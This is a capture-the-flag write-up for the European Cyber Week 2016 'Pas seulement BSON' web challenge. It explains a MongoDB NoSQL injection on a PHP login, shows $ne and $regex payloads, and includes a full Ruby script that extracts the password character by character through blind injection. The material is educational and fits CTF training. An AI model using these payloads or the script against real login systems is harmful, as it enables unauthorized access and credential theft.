writeups

ECW - 100 - Pas seulement BSON - Web

noraj (Alexandre ZANNI)
, , ,
🇬🇧

Information#

Version#

By Version Comment
noraj 1.0 Creation

CTF#

  • Name : European Cyber Week CTF Quals 2016
  • Website : challenge-ecw.fr
  • Type : Online
  • Format : Jeopardy - Student

Description#

N.A.

Solution#

This is a NoSQL injection on the famous MongoDB with certain PHP at backend.

We used the query operators to perform the NoSQLi.

We tested the following payload in our script with the ne query operator to confirm presence of the vulnerability:

1
password[$ne]=nosql&nonce=myNonce

Then we retrieved the password letter by letter with the regex query operator of NoSQL. At the beginning the script uses the following paylods:

1
2
3
4
5
password[$regex]=ECW{.{32}}&nonce=myNonce
password[$regex]=ECW{a.{31}}&nonce=myNonce
password[$regex]=ECW{b.{31}}&nonce=myNonce
password[$regex]=ECW{c.{31}}&nonce=myNonce
[...]

Each bad request results in an authentification failure and when the right char is found with a succesful authentification, the script with try to find the next chars with something like:

1
2
3
4
5
password[$regex]=ECW{2.{31}}&nonce=myNonce
password[$regex]=ECW{2a.{30}}&nonce=myNonce
password[$regex]=ECW{2b.{30}}&nonce=myNonce
password[$regex]=ECW{2c.{30}}&nonce=myNonce
[...]

So here is our script that we adapted from the first web challenge Authentification.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env ruby

require 'curb' # for get/post requests

hostname = 'https://challenge-ecw.fr/chals/web200'
nonce = 'myNonce'

c = Curl::Easy.new(hostname) do |curl|
  curl.headers['Cookie'] = 'session=mySessionCookie'
  curl.headers['Referer'] = hostname
  curl.headers['Host'] = 'challenge-ecw.fr'
  curl.headers['Connection'] = 'keep-alive'
  curl.headers['Upgrade-Insecure-Requests'] = '1'
  #curl.verbose = true
end # Curl
c.perform # send the request

if c.body_str.match(/Un nouveau m/)
  puts '• Connexion to ECW works'
end

length = 32 # md5(hash)

# Find each char of the password one by one
answer = ""
ECW_flag_alphabet_array = ('a'..'f').to_a + (0.to_s..9.to_s).to_a # md5(hash)
(1..length).each do |offset|
  ECW_flag_alphabet_array.each do |char|
    c.http_post(Curl::PostField.content('password[$regex]', "ECW{#{answer}#{char}.{#{length - offset}}}"),
                Curl::PostField.content('nonce', nonce))
    c.perform
    if c.body_str.match(/Authentification valide\. Le mot de passe est le flag\./)
      answer.concat(char)
      puts "Password: ECW{#{answer}}"
      break
    else
      puts "Tried: ECW{#{answer}#{char}}"
    end
  end
end
Share